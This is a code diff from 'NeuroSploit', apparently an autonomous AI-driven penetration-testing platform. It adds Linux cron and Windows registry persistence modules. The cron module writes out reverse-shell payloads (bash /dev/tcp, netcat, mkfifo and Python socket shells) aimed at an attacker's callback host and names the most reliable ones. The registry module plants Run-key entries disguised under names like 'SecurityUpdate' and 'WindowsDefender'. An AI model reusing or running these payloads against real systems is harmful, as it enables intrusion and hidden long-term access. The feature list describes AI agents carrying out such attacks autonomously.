NeuroSploit v3.2 - Autonomous AI Penetration Testing Platform

116 modules | 100 vuln types | 18 API routes | 18 frontend pages

Major features:
- VulnEngine: 100 vuln types, 526+ payloads, 12 testers, anti-hallucination prompts
- Autonomous Agent: 3-stream auto pentest, multi-session (5 concurrent), pause/resume/stop
- CLI Agent: Claude Code / Gemini CLI / Codex CLI inside Kali containers
- Validation Pipeline: negative controls, proof of execution, confidence scoring, judge
- AI Reasoning: ReACT engine, token budget, endpoint classifier, CVE hunter, deep recon
- Multi-Agent: 5 specialists + orchestrator + researcher AI + vuln type agents
- RAG System: BM25/TF-IDF/ChromaDB vectorstore, few-shot, reasoning templates
- Smart Router: 20 providers (8 CLI OAuth + 12 API), tier failover, token refresh
- Kali Sandbox: container-per-scan, 56 tools, VPN support, on-demand install
- Full IA Testing: methodology-driven comprehensive pentest sessions
- Notifications: Discord, Telegram, WhatsApp/Twilio multi-channel alerts
- Frontend: React/TypeScript with 18 pages, real-time WebSocket updates

tools/persistence/__init__.py

@@ -0,0 +1,9 @@
+"""
+Persistence Tools
+Contains modules for maintaining access to compromised systems
+"""
+
+from .cron_persistence import CronPersistence
+from .registry_persistence import RegistryPersistence
+
+__all__ = ['CronPersistence', 'RegistryPersistence']

tools/persistence/cron_persistence.py

@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+"""
+Cron Persistence - Linux persistence via cron jobs
+"""
+import logging
+from typing import Dict, List
+
+logger = logging.getLogger(__name__)
+
+class CronPersistence:
+    """
+    Cron-based persistence techniques for Linux systems.
+    """
+    def __init__(self, config: Dict):
+        """
+        Initializes CronPersistence module.
+
+        Args:
+            config (Dict): Configuration dictionary
+        """
+        self.config = config
+        logger.info("CronPersistence module initialized")
+
+    def generate_cron_entry(self, command: str, interval: str = "daily") -> str:
+        """
+        Generate a cron entry for persistence.
+
+        Args:
+            command (str): Command to execute
+            interval (str): Execution interval (hourly, daily, weekly, reboot)
+
+        Returns:
+            str: Cron entry string
+        """
+        logger.info(f"Generating cron entry for: {command}")
+
+        intervals = {
+            "hourly": "0 * * * *",
+            "daily": "0 0 * * *",
+            "weekly": "0 0 * * 0",
+            "reboot": "@reboot",
+            "every_5min": "*/5 * * * *"
+        }
+
+        cron_time = intervals.get(interval, "0 0 * * *")
+        cron_entry = f"{cron_time} {command}"
+
+        logger.info(f"Generated cron entry: {cron_entry}")
+        return cron_entry
+
+    def suggest_cron_locations(self, username: str = None) -> Dict:
+        """
+        Suggest locations for cron-based persistence.
+
+        Args:
+            username (str): Target username
+
+        Returns:
+            Dict: Cron file locations and methods
+        """
+        locations = {
+            "user_crontab": f"crontab -e (for user {username or 'current'})",
+            "system_cron_dirs": [
+                "/etc/cron.d/",
+                "/etc/cron.daily/",
+                "/etc/cron.hourly/",
+                "/etc/cron.weekly/",
+                "/var/spool/cron/crontabs/"
+            ],
+            "cron_files": [
+                "/etc/crontab",
+                f"/var/spool/cron/crontabs/{username}" if username else None
+            ]
+        }
+
+        return {k: v for k, v in locations.items() if v is not None}
+
+    def generate_persistence_payload(self, callback_host: str, callback_port: int) -> Dict:
+        """
+        Generate reverse shell cron payload.
+
+        Args:
+            callback_host (str): Attacker's IP/hostname
+            callback_port (int): Attacker's listening port
+
+        Returns:
+            Dict: Payload information
+        """
+        payloads = {
+            "bash_tcp": f"bash -i >& /dev/tcp/{callback_host}/{callback_port} 0>&1",
+            "nc_traditional": f"nc {callback_host} {callback_port} -e /bin/bash",
+            "nc_mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {callback_host} {callback_port} >/tmp/f",
+            "python": f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{callback_host}\",{callback_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
+        }
+
+        return {
+            "callback_host": callback_host,
+            "callback_port": callback_port,
+            "payloads": payloads,
+            "recommendation": "Use bash_tcp or nc_mkfifo for reliability"
+        }

tools/persistence/registry_persistence.py

@@ -0,0 +1,125 @@
+#!/usr/bin/env python3
+"""
+Registry Persistence - Windows persistence via registry keys
+"""
+import logging
+from typing import Dict, List
+
+logger = logging.getLogger(__name__)
+
+class RegistryPersistence:
+    """
+    Windows registry-based persistence techniques.
+    """
+    def __init__(self, config: Dict):
+        """
+        Initializes RegistryPersistence module.
+
+        Args:
+            config (Dict): Configuration dictionary
+        """
+        self.config = config
+        logger.info("RegistryPersistence module initialized")
+
+    def get_persistence_keys(self) -> Dict:
+        """
+        Get common Windows registry keys for persistence.
+
+        Returns:
+            Dict: Registry persistence locations
+        """
+        persistence_keys = {
+            "run_keys": {
+                "HKCU_Run": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
+                "HKLM_Run": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
+                "HKCU_RunOnce": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
+                "HKLM_RunOnce": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+            },
+            "startup_folders": {
+                "user_startup": r"C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
+                "all_users_startup": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
+            },
+            "services": {
+                "services_key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
+            },
+            "winlogon": {
+                "userinit": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
+                "shell": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
+            }
+        }
+
+        logger.info("Retrieved Windows persistence registry keys")
+        return persistence_keys
+
+    def generate_registry_command(self, key_path: str, value_name: str, value_data: str) -> str:
+        """
+        Generate registry modification command.
+
+        Args:
+            key_path (str): Registry key path
+            value_name (str): Value name
+            value_data (str): Value data
+
+        Returns:
+            str: REG ADD command
+        """
+        cmd = f'reg add "{key_path}" /v "{value_name}" /t REG_SZ /d "{value_data}" /f'
+        logger.info(f"Generated registry command: {cmd}")
+        return cmd
+
+    def generate_persistence_payload(self, payload_path: str, method: str = "run_key") -> Dict:
+        """
+        Generate persistence payload using registry.
+
+        Args:
+            payload_path (str): Path to payload executable
+            method (str): Persistence method (run_key, service, winlogon)
+
+        Returns:
+            Dict: Persistence configuration
+        """
+        methods = {
+            "run_key": {
+                "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
+                "value": "SecurityUpdate",
+                "command": self.generate_registry_command(
+                    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
+                    "SecurityUpdate",
+                    payload_path
+                )
+            },
+            "run_key_system": {
+                "key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
+                "value": "WindowsDefender",
+                "command": self.generate_registry_command(
+                    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
+                    "WindowsDefender",
+                    payload_path
+                ),
+                "requires": "Administrator privileges"
+            }
+        }
+
+        result = methods.get(method, methods["run_key"])
+        result["payload_path"] = payload_path
+        result["method"] = method
+
+        return result
+
+    def get_enumeration_commands(self) -> List[str]:
+        """
+        Get commands to enumerate existing persistence mechanisms.
+
+        Returns:
+            List[str]: Registry query commands
+        """
+        commands = [
+            r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
+            r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"',
+            r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
+            r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
+            r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"'
+        ]
+
+        logger.info("Generated registry enumeration commands")
+        return commands